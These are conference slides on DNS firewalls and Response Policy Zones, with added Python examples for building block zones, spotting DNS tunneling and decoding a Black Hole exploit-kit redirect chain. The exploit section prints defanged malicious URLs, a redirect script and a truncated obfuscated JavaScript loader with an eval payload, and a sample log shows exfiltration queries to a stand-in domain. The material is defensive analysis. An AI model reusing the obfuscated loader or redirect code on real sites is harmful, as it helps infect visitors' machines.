Using the DNS as a Hammer: The Good, the Bad and the Ugly


Using the DNS as a Hammer: The Good, the Bad and the Ugly. SATIN, March 22, 2012

March 22, 2012, SATIN Conference


Presenter: Rod Rasmussen, Rod.Rasmussen<at>InternetIdentity.com
- President & CTO, Internet Identity
- Co-Chair, APWG Internet Policy Committee
- Recently joined SSAC
- Active member: FIRST, MAAWG, DNS-OARC, Digital PhishNet, RISG, OTA, FCC CSRIC

State of Play
- Malicious domains/hosts are created regularly
- Heavy abuse continues, usually registrar-specific; malware is the driver today
- Enterprises are attacked stealthily via hostnames (Aurora, Night Dragon, Shady RAT)
- Governments have discovered the DNS
- RIAA, MPAA and trademark/IP holders have discovered the DNS

Nails
- Malware C&Cs
- Phishing domains
- Mule sites
- Counterfeit goods
- Piracy
- Trademark infringement
- Anti-government sites
- Dissidents

The Hammer
- Recursive DNS servers
- Blocking domains/hostnames
- Filtering/redirecting domains/hostnames
- Ditto with IP addresses, via reverse resolution
- Specialized nameserver software or add-ons: BIND RPZs
- Think of this as a DNS Firewall

How to Use the Hammer
- Simple really: pre-load the cache with the responses you want to give, and keep them there
- Done regularly for various routing/internal uses
- Many ways to get entries in there
- Can synthesize values or return NXDOMAIN
- Also seen some nasty CNAME stuff
- Get lists of hostnames to block from somewhere
- RPZs make this trivial, secure and very scalable

RPZ: Response Policy Zones
"Most new domain names are malicious. I am stunned by the simplicity and truth of that observation. Every day lots of new names are added to the global DNS, and most of them belong to scammers, spammers, e-criminals, and speculators. Domains are cheap, domains are plentiful, and as a result most of them are dreck or worse."
Paul Vixie, "Taking Back the DNS", July 30, 2010, http://www.circleid.com/posts/20100728_taking_back_the_dns/
RPZ (Response Policy Zones) is the result:
- Any BIND resolver can easily implement large-scale domain block lists
- Scalable: several lists, different policies per list
- Fast: automatically updated with real-time data (an RPZ is an ordinary DNS zone, so it is distributed by standard zone transfer)
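The RPZ encoding behind the two slides above, as an added example (not the presenter's code): a Python script that turns a small blocklist into a BIND response policy zone, using the trigger and action encodings RPZ defines (QNAME, rpz-ip and rpz-nsdname triggers; NXDOMAIN, NODATA, PASSTHRU and a CNAME redirect to a walled garden). The zone name rpz.example, the host walledgarden.example.net and every domain and address in RULES are constructed placeholders.

```python
"""Build a BIND Response Policy Zone (RPZ) file from a small blocklist.

Added example, not code from the talk. The zone name, the walled-garden
host and every domain/IP below are constructed placeholders.
"""
import ipaddress
from typing import List, Tuple

# In BIND the action is encoded as the CNAME target of the trigger record:
#   CNAME .              -> NXDOMAIN
#   CNAME *.             -> NODATA (NOERROR, empty answer)
#   CNAME rpz-passthru.  -> answer normally but log the policy hit (whitelist)
#   CNAME <other name>   -> "local data": redirect the client to that name
ACTIONS = {"nxdomain": ".", "nodata": "*.", "passthru": "rpz-passthru."}

# (trigger kind, trigger value, action). Constructed sample rules.
Rule = Tuple[str, str, str]
RULES: List[Rule] = [
    ("qname", "badguydomain.tld", "nxdomain"),                         # malware C&C
    ("qname", "login-yourbank.example", "walledgarden.example.net."),  # phish -> warning page
    ("qname", "updates.example.com", "passthru"),                      # never block this one
    ("ip", "198.51.100.7/32", "nxdomain"),                             # any answer pointing here
    ("ip", "203.0.113.0/24", "nxdomain"),                              # ...or into this net
    ("nsdname", "ns1.badguydomain.tld", "nxdomain"),                   # anything served by this NS
]


def ip_owner(cidr: str) -> str:
    """Owner name for an IP trigger: <prefixlen>.<reversed octets>.rpz-ip."""
    net = ipaddress.IPv4Network(cidr, strict=False)
    reversed_octets = ".".join(reversed(str(net.network_address).split(".")))
    return f"{net.prefixlen}.{reversed_octets}.rpz-ip"


def rpz_records(rule: Rule) -> List[str]:
    """Zone-file lines for one rule (owner names are relative to the zone origin)."""
    kind, value, action = rule
    target = ACTIONS.get(action, action)  # anything not in ACTIONS is a redirect target
    if kind == "qname":
        name = value.rstrip(".")
        # The bare name plus a wildcard, so subdomains are covered as well.
        return [f"{name} CNAME {target}", f"*.{name} CNAME {target}"]
    if kind == "ip":
        return [f"{ip_owner(value)} CNAME {target}"]
    if kind == "nsdname":
        return [f"{value.rstrip('.')}.rpz-nsdname CNAME {target}"]
    raise ValueError(f"unknown trigger kind {kind!r}")


def build_rpz_zone(serial: int, rules: List[Rule], ttl: int = 300) -> str:
    """Return a complete RPZ zone file. A low TTL keeps policy changes quick to take effect."""
    header = [
        f"$TTL {ttl}",
        f"@ SOA localhost. hostmaster.localhost. ({serial} 3600 600 86400 60)",
        "@ NS localhost.",
    ]
    body = [line for rule in rules for line in rpz_records(rule)]
    return "\n".join(header + body) + "\n"


# named.conf wiring (BIND 9.8+); several zones may be listed, each with its own
# policy override, e.g. "zone "rpz.vendor" policy nxdomain;":
#   options { response-policy { zone "rpz.example"; }; };
#   zone "rpz.example" { type master; file "rpz.example.db"; };
if __name__ == "__main__":
    print(build_rpz_zone(2012032201, RULES), end="")
```

Feed the output to the zone file named in `named.conf` and bump the serial on every change; secondaries pick it up through normal zone transfer.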

Perspective is Key
Protecting what?
- Enterprise network
- Critical infrastructure
- ISP customer base
Protecting for whom?
- Your own network/employees
- Customers
- Government
- IP holders

What is the User Incentive?
- Works for a company with sensitive data
- Doesn't want to lose their own PII
- Doesn't want their computer infected
- Wants to keep kids away from certain content
- Doesn't want to overpay for music/movies
- Wants to buy stuff that's not quite legal (gray market)
- Wants to speak out against the government
- Wants to start a revolution

User and Network Operator Goals
- Must be aligned
- Alignment makes filtering/blocking workable
- Non-alignment leads to user non-acceptance
- Alternative DNS solutions are available
- Alternatives to DNS itself are available
- Users will forgo protection against some threats (malware) to achieve their own goals (cheap music)

Worst-case Scenarios
- Rampant use of alternate, unsafe DNS servers
- Rise of shady software that allows circumvention, potentially opening up new exploits
- Split root

The Good
There would be a really cool picture of Clint Eastwood here from the movie, but I didn't want to get sued by MGM.

Enterprises and Government Users
- Under constant assault these days; 2011 was the year of the data breach
- Spear phishing, malware via e-mail/social engineering
- Hacking and silent extraction of data (aka APT)
- Criminal and nation-state actors
- Most attacks leverage hostnames
- Exfiltration via victim.badguydomain.tld. DUH!
- Plenty of data available, but not implemented at the perimeter
- Time to install a DNS Firewall

Very Tight Protection Possible
- Enterprises have alignment with users
- Can dictate port 53 policy: all users must use the DNS Firewall recursive servers (in practice, block outbound port 53 at the perimeter except from those resolvers)
- Via VPN for remote users
- Many solutions and list sources available
- Can use DNS resolution logging to detect anomalies
- Previously unknown malware/data exfiltration
- DNS tunneling and malware C&C via the DNS
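One way to do the anomaly detection the slide calls for, as an added example rather than anything from the talk: a Python scorer that reads BIND query-log lines and flags registered domains that receive many distinct, long, high-entropy labels, or mostly TXT/NULL queries, which is what data carried out in the QNAME looks like. The log lines, the attacker domain badguydomain.tld, the client addresses and the thresholds are all constructed; the two-label approximation of the registered domain is a simplification called out in the code.

```python
"""Flag likely DNS tunneling / exfiltration in BIND query logs.

Added example, not the presenter's code. Log lines are constructed and the
thresholds are starting points to tune against your own baseline.
"""
import math
import re
from collections import defaultdict
from typing import Dict, List

# BIND 9 querylog line (older style, without the parenthesised qname after the client):
#   <date> client <ip>#<port>: query: <qname> IN <qtype> <flags> (<server ip>)
QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+.*?query: (?P<qname>\S+) IN (?P<qtype>\S+) ")

# Constructed sample: ordinary browsing mixed with a beacon that encodes data in
# long, random-looking labels under one attacker domain and asks for TXT.
SAMPLE_LOG = """\
22-Mar-2012 10:15:01.001 client 10.0.0.5#51234: query: www.example.com IN A + (10.0.0.2)
22-Mar-2012 10:15:01.120 client 10.0.0.5#51235: query: mail.example.com IN MX + (10.0.0.2)
22-Mar-2012 10:15:02.300 client 10.0.0.7#40001: query: cdn.example.net IN A + (10.0.0.2)
22-Mar-2012 10:15:02.450 client 10.0.0.5#51236: query: 4d61726b6574696e672d51322e786c73.badguydomain.tld IN TXT + (10.0.0.2)
22-Mar-2012 10:15:02.900 client 10.0.0.5#51237: query: a1b2c3d4e5f60718293a4b5c6d7e8f90.badguydomain.tld IN TXT + (10.0.0.2)
22-Mar-2012 10:15:03.200 client 10.0.0.5#51238: query: 00b7e1f5c0a8017e3b9d2c6f44a1.badguydomain.tld IN TXT + (10.0.0.2)
22-Mar-2012 10:15:03.600 client 10.0.0.5#51239: query: 9f8e7d6c5b4a39281706f5e4d3c2b1a0.badguydomain.tld IN TXT + (10.0.0.2)
22-Mar-2012 10:15:04.100 client 10.0.0.5#51240: query: e2a7c4f9b1d30e5867a9c0f4d1b2e3.badguydomain.tld IN TXT + (10.0.0.2)
22-Mar-2012 10:15:04.500 client 10.0.0.5#51241: query: 7b3c9d1e5f2a6048c7e9b0d1a2f3c4e5.badguydomain.tld IN TXT + (10.0.0.2)
22-Mar-2012 10:15:05.000 client 10.0.0.7#40002: query: www.example.com IN A + (10.0.0.2)
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payload labels score far above dictionary words."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Approximation: the last two labels. A real deployment needs a public-suffix
    list so that host.example.co.uk groups under example.co.uk, not co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def summarize(log_text: str) -> Dict[str, dict]:
    """Per registered domain: query count, distinct subdomains, mean prefix length,
    mean prefix entropy and the share of TXT/NULL queries."""
    stats: Dict[str, dict] = {}
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname, qtype = m["qname"].rstrip(".").lower(), m["qtype"].upper()
        dom = registered_domain(qname)
        prefix = qname[: -len(dom)].rstrip(".")  # everything left of the registered domain
        st = stats.setdefault(dom, {"queries": 0, "subdomains": set(), "prefix_len": 0,
                                    "entropy": 0.0, "txt_null": 0})
        st["queries"] += 1
        st["subdomains"].add(prefix)
        st["prefix_len"] += len(prefix)
        st["entropy"] += shannon_entropy(prefix.replace(".", ""))
        st["txt_null"] += qtype in ("TXT", "NULL")
    for st in stats.values():
        n = st["queries"]
        st["distinct_subdomains"] = len(st.pop("subdomains"))
        st["mean_prefix_len"] = st.pop("prefix_len") / n
        st["mean_entropy"] = st.pop("entropy") / n
        st["txt_null_share"] = st.pop("txt_null") / n
    return stats


def suspicious_domains(log_text: str, min_subdomains: int = 5, min_prefix_len: float = 20.0,
                       min_entropy: float = 3.0, min_txt_share: float = 0.5) -> List[str]:
    """Flag a domain that shows many distinct, long, high-entropy labels, or whose
    queries are mostly TXT/NULL (the record types tunnels favour for bulk data)."""
    flagged = []
    for dom, st in summarize(log_text).items():
        label_pattern = (st["distinct_subdomains"] >= min_subdomains
                         and st["mean_prefix_len"] >= min_prefix_len
                         and st["mean_entropy"] >= min_entropy)
        type_pattern = st["queries"] >= min_subdomains and st["txt_null_share"] >= min_txt_share
        if label_pattern or type_pattern:
            flagged.append(dom)
    return sorted(flagged)


if __name__ == "__main__":
    for dom, st in summarize(SAMPLE_LOG).items():
        print(f"{dom:20} q={st['queries']:2} sub={st['distinct_subdomains']:2} "
              f"len={st['mean_prefix_len']:5.1f} H={st['mean_entropy']:.2f} txt={st['txt_null_share']:.2f}")
    print("suspicious:", suspicious_domains(SAMPLE_LOG))
```

Run it over a day of query logs per resolver and the flagged domains become candidates for the RPZ; the high-entropy label test also catches DGA-style names, so review hits against passive DNS before blocking.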

The Bad
There would be a really cool picture of Lee Van Cleef here from the movie, but I didn't want to get sued by MGM.

SOPA/PIPA and Other US Legislation
- High-profile legislation in the US that would require ISPs to block domains at resolvers, due to lack of action by other countries
- Agree with it or not, lack of process and/or response to long-standing issues has allowed advocates to pursue this avenue
- Supported by IP holders with strong backing
- Off the table for now, but certainly not dead

Worldwide Regulatory Impacts
- Legislation with similar effect is being adopted/discussed throughout Europe
- Italy -> led to large-scale adoption of alternate DNS
- France -> varied approach/results
- ACTA (not truly equivalent, but Anon thinks so)
- Popping up around the world
- Some countries run national firewalls and filtering, and have for years
- Real implications for all recursive DNS operators

Why This Doesn't Work
- Users want the blocked content
- Alternative methods exist to get it
- IP-address-based resources: you do remember that DNS just maps names to IPs, right?
- Alternative DNS servers abound
- ISPs cannot force port 53 (anti-competitive)
- DNS can use other ports, proxies
- Proxy servers for web and other content
- Breaks DNSSEC (well, it will at some point)

The Ugly
There would be a really cool picture of Eli Wallach here from the movie, but I didn't want to get sued by MGM.

DNSSEC May (Will) Break
- Currently not an issue with recursive-server-level validation
- Will be a major problem with endpoint validation
- DNS Firewall responses are lies, and DNSSEC doesn't like being lied to
- Clients will find an alternative validation method and still get to the bad hostname
- This needs to be fixed for compatibility
(In BIND's RPZ implementation the response-policy option break-dnssec defaults to no: a response that carries DNSSEC data for a query with the DO bit set is not rewritten, so a validating endpoint keeps DNSSEC but loses the firewall; break-dnssec yes rewrites anyway, and the validating endpoint then sees a bogus answer.)

The Other

Complex Attacks Using Evil Domains
- The game is changing significantly
- Redirects for drive-by downloads
- Obfuscation and hiding techniques
- ACLs to prevent responders from seeing issues
- Malware rendezvous and C&C hidden in code
- Abuse of WHOIS privacy to shield criminal registrations (ICANN studies underway)
- Criminals' use of automated domain registration processes built into the malware control panel
- DGAs (domain generation algorithms) for automated botnet reconnections

Sample: Black Hole Exploit Site
- Massive phishy spam campaigns
- Lures lead to compromised sites
- Redirect to other sites
- Eventual landing page uses tricks to exploit browser bugs and infect the machine
- Redirection is obfuscated, so it is hard to know what domains are involved

Lure E-mail
Obfuscated URL: hxxp://stonehengeroofingproducts.com/emngorgc/index.html
DO NOT GO TO THAT SITE WITH A WINDOWS MACHINE!!!!

What you get

First Lure Site
- Hacked server, needs fixing
- Redirects to further hacked servers
- Modified to prevent infection! (URLs defanged as hxxp)

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://skodamene.no/clftseyg/js.js"></script>
<script type="text/javascript" src="hxxp://bendabebemimos.com/jhgfzcjv/js.js"></script>
<script type="text/javascript" src="hxxp://produccionesqueens.com/acfv9bml/js.js"></script>
<script type="text/javascript" src="hxxp://purchasemiraclemineral.info/yxcrbqxk/js.js"></script>
<script type="text/javascript" src="hxxp://successwithsoftware.com/49qkhzro/js.js"></script>
<script type="text/javascript" src="hxxp://thefocuspointphotography.com/jnzxp3ea/js.js"></script>
</html>

Intermediate Site: hxxp://skodamene.no/clftseyg/js.js
- Another hacked site that needs cleanup
- Contents simply redirect elsewhere:

document.location='hxxp://hakkaboat.com/search.php?page=73a07bcb51f4be71';

Actual Infection Site: hxxp://hakkaboat.com/search.php?
- Domain is owned by the criminal
- Go there directly and you end up at Google
- Exploits various browser flaws
- Eventually downloads Zeus
- That version of Zeus is controlled by several criminally controlled domains that need to be suspended as well

Obfuscated Code on Exploit Site

<html><body><script>
// Anti-analysis check: both sides stringify a native function ("function unshift() ..."),
// so the payload only runs where a===aa, i.e. in a real browser engine.
if(window.document) a=([].unshift+16).substr(1,3);
aa=([].unshift+[].unshift).substr(1,3);
if(a===aa) f={q:["59'70'58'76'68'60'69'75'5'78'73'64'75'60'-1'-2'19'58'60'69'75'60'73'21'19'63'8'21'39'67'60'56'74'60'-9'78'56'64'75'-9'71'56'62'60'-9'64'74'-9'67'70'56'59'64'69'62'5'5'5'19'6'63'8'21'19'6'58'60'69'75'60'73'21'19'63'73'21'-2'0'18'61'76'69'58'75'64'70'69'-9'60'69'59'54'73'60'59'64'73'60'58'75'-1'0'82'78'64'69'59'70'78'5'67'70'58'56'75'64'70'69'5'63'73'60'61'20' ... Deleted 1000s of lines of code ... '-1'60'69'59'54'73'60'59'64'73'60'58'75'3'15'7'7'7'0'18'84'74'71'67'7'-1'0'18"][0]}.q.split("'");
md='a'; e=eval; w=f; s=''; f='f';
st=e("S".concat("tri","ng"));                       // "String", assembled to dodge string matching
// Decode: every token is a character code minus 41; the result is eval'd below.
for(i=0;i<w.length;i++) { z=w[i]; s=s.concat(st[f+'romCharCod'+'e'](41+parseInt(z))); }
q={run:{run:function(w){e(w)}}};
q['run']['ru'+'n'](s);
</script></body></html>

Getting these shut down is HARD!
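Walking the redirect chain on the preceding slides in code, as an added example (not the presenter's): the Python script below pulls the hostnames the lure page loads scripts from and the redirect target of the intermediate js.js, which together are the list a DNS firewall needs, and reverses the exploit page's encoding, in which every token is a character code minus 41 and the original runs String.fromCharCode(41 + parseInt(z)). Only the token prefix and tail visible on the slide are decoded; the elided middle of the payload stays unknown. LURE_HTML is a copy of the slide's page with the URLs left defanged; the decode helper and the regexes are the example's own.

```python
"""Extract the hosts in a Black Hole redirect chain and decode the landing page's payload.

Added example, not the presenter's code. LURE_HTML copies the slide (URLs
defanged as hxxp); PAYLOAD_HEAD/PAYLOAD_TAIL are the visible fragments of the
encoded string; the elided middle is not reconstructed.
"""
import re
from typing import List

LURE_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://skodamene.no/clftseyg/js.js"></script>
<script type="text/javascript" src="hxxp://bendabebemimos.com/jhgfzcjv/js.js"></script>
<script type="text/javascript" src="hxxp://produccionesqueens.com/acfv9bml/js.js"></script>
<script type="text/javascript" src="hxxp://purchasemiraclemineral.info/yxcrbqxk/js.js"></script>
<script type="text/javascript" src="hxxp://successwithsoftware.com/49qkhzro/js.js"></script>
<script type="text/javascript" src="hxxp://thefocuspointphotography.com/jnzxp3ea/js.js"></script>
</html>"""

INTERMEDIATE_JS = "document.location='hxxp://hakkaboat.com/search.php?page=73a07bcb51f4be71';"

# The two fragments of the encoded payload that are visible on the slide.
PAYLOAD_HEAD = ("59'70'58'76'68'60'69'75'5'78'73'64'75'60'-1'-2'19'58'60'69'75'60'73'21'19'63'8'21'"
                "39'67'60'56'74'60'-9'78'56'64'75'-9'71'56'62'60'-9'64'74'-9'67'70'56'59'64'69'62'"
                "5'5'5'19'6'63'8'21'19'6'58'60'69'75'60'73'21'19'63'73'21'-2'0'18'61'76'69'58'75'64'"
                "70'69'-9'60'69'59'54'73'60'59'64'73'60'58'75'-1'0'82'78'64'69'59'70'78'5'67'70'58'"
                "56'75'64'70'69'5'63'73'60'61'20")
PAYLOAD_TAIL = "-1'60'69'59'54'73'60'59'64'73'60'58'75'3'15'7'7'7'0'18'84'74'71'67'7'-1'0'18"

# Accept both live (http) and defanged (hxxp) URLs.
SCRIPT_SRC_RE = re.compile(r"""<script[^>]+src=["']?h[xt]{2}ps?://([^/"'\s>]+)""", re.IGNORECASE)
REDIRECT_RE = re.compile(r"""document\.location\s*=\s*['"]h[xt]{2}ps?://([^/'"]+)""")


def script_hosts(html: str) -> List[str]:
    """Hostnames a page loads scripts from, de-duplicated, in page order."""
    seen: List[str] = []
    for host in SCRIPT_SRC_RE.findall(html):
        host = host.lower()
        if host not in seen:
            seen.append(host)
    return seen


def redirect_host(js: str) -> str:
    """Hostname of a document.location redirect, or '' if there is none."""
    m = REDIRECT_RE.search(js)
    return m.group(1).lower() if m else ""


def decode_payload(tokens: str, offset: int = 41) -> str:
    """Reverse the landing page's scheme: chr(offset + int(token)) for each '-separated token."""
    return "".join(chr(offset + int(t)) for t in tokens.split("'") if t.strip())


def chain_hosts() -> List[str]:
    """Every hostname in the chain, the block list a DNS firewall would load."""
    return script_hosts(LURE_HTML) + [redirect_host(INTERMEDIATE_JS)]


if __name__ == "__main__":
    print("hosts to block:", chain_hosts())
    print("decoded head:", decode_payload(PAYLOAD_HEAD))
    print("decoded tail:", decode_payload(PAYLOAD_TAIL))
```

The decoded head turns out to be a "Please wait" banner followed by a function that sets window.location.href, and the tail fires it with an 8-second setTimeout; the hidden middle is where the landing URL and exploit selection live, which is why blocking the hostnames at the resolver is the practical move.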

DNS Firewalls Easily Block These
- Can implement a block/redirect as soon as a new exploit site is identified
- Users clicking on e-mails will never get to the eventual drop site
- Many techniques identify bad domains prior to use: passive DNS, nameserver monitoring, registration data for new domains

A Recent Question on .su
- High levels of abuse on a TLD led to a potential full block by a major organization
- Answer was: yeah, probably worth it
- Abuse.ch recommends blocking the entire .su TLD: http://www.abuse.ch/?p=3581

Wrap-up
- We have a variety of issues that appear, to some, to all be nails
- DNS provides an effective hammer if your goals are aligned (enterprise, anti-malware)
- Will smash your thumb if users don't want to be redirected or blocked
- Issues with DNSSEC need to be addressed long-term
- We will see a lot of this; the time to get it right is now!

Thank You! Now for your questions.
